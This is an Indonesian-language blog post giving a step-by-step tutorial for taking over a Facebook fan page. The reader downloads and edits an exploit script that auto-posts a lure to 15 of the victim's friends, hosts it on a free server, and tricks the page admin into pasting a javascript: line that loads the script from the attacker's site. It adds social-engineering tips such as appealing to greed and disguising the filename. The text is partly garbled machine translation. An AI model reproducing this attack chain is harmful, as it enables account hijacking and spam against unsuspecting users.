Cara Hack Facebook menggunakan FanPage terbaru saat ini Download Software

Cara Hack Facebook menggunakan FanPage terbaru saat ini Download Software




Kemarin lalu saya akan menunjukkan cara untuk hack Facebook fan page. Ini adalah posting pertama saya di Kebenaran Hacking dan saya sangat gembira dengan hal itu. Saya harap Anda menyukai tutorial ini dan memberikan umpan Anda kembali di komentar.Sekarang mari kita memulai tutorial. Pertama-tama kita perlu untuk setup sebuah mengeksploitasi dan sebuah website untuk host mengeksploitasi. Jika Anda sudah memiliki hosting maka yang besar jika tidak ada beberapa situs hosting gratis yang dapat digunakan untuk tujuan tersebut. Saya akan memberitahu Anda tentang hal itu bersama dengan tutorial.Disclaimer: Coder dan situs terkait tidak bertanggung jawab atas penyalahgunaan dilakukan dengan menggunakan trik ini.

1. Download dari link ini mengeksploitasi.Link.


2. Setelah men-download, Anda perlu mengedit itu. Dapatkan notepad + +, salah satu editor panas favorit saya. Anda dapat men-download dari sini.here.

 
3. Buka file tersebut dengan notepad bernama pagehack.js + +. Sekarang menemukan teks wamiqali@hungry-hackers.com dengan menekan CTRL+F dan menggantinya dengan id email anda sendiri yang telah digunakan saat mendaftar untuk facebook.


4. Sekarang Anda harus mengubah teks virus yang akan dikirim ke teman-teman korban. Untuk melakukan ini, menemukan teks Hei Lihat apa yang saya punya!dan menggantinya dengan teks Anda sendiri.

 Teks ini akan dikirim ke facebook dinding dari 15 teman-teman korban. Sejak itu adalah bot autoposting, untuk mencegah facebook dari menghalangi itu, saya mengurangi kapasitasnya untuk 15. Sekarang hanya simpan sebagai anything.js 
(Tip: Jadilah insinyur sosial dan rename menjadi sesuatu yang lebih menarik seperti getprizes.js atau booster.js)

5. Sekarang Anda harus meng-upload script ini ke server Anda. Untuk ini membuat account di 0fess.net atau 000webhost.com (t35 atau 110MB tidak akan membantu kali ini) dan menggunakan filezilla dan upload ini ke root anda. Jadi alamat mana script Anda upload akan sebagai berikut:www.yoursite.0fess.net/booster.js


6. Sekarang sampai pada bagian terpenting dari Hack ini. Anda perlu meyakinkan admin bahwa halaman Fan untuk menempatkan kode berikut 

(Catatan: Jangan lupa untuk mengganti teks dalam huruf tebal dengan alamat naskah Anda) di address bar browser-nya dan tekan enter sementara ia ada di Facebook. 

javascript:. (. a = (b = dokumen) createElement ("script")) src = "/ / www.yoursite.0fess.net/booster.js", b.body.appendChild (a); void (0) 

Tip: Anda dapat menipu dirinya dengan membuatnya serakah untuk meraih sesuatu. Anda juga dapat mengkodekan ini dalam format ASCII untuk hasil yang lebih baik lagi.


bagi yang mengkopy artikel ini
Sertakan alamat ini ; http://rafi-orilya.blogspot.com/

Terima Kasih
by Rafi Aldiansyah Asikin
Previous
Next Post »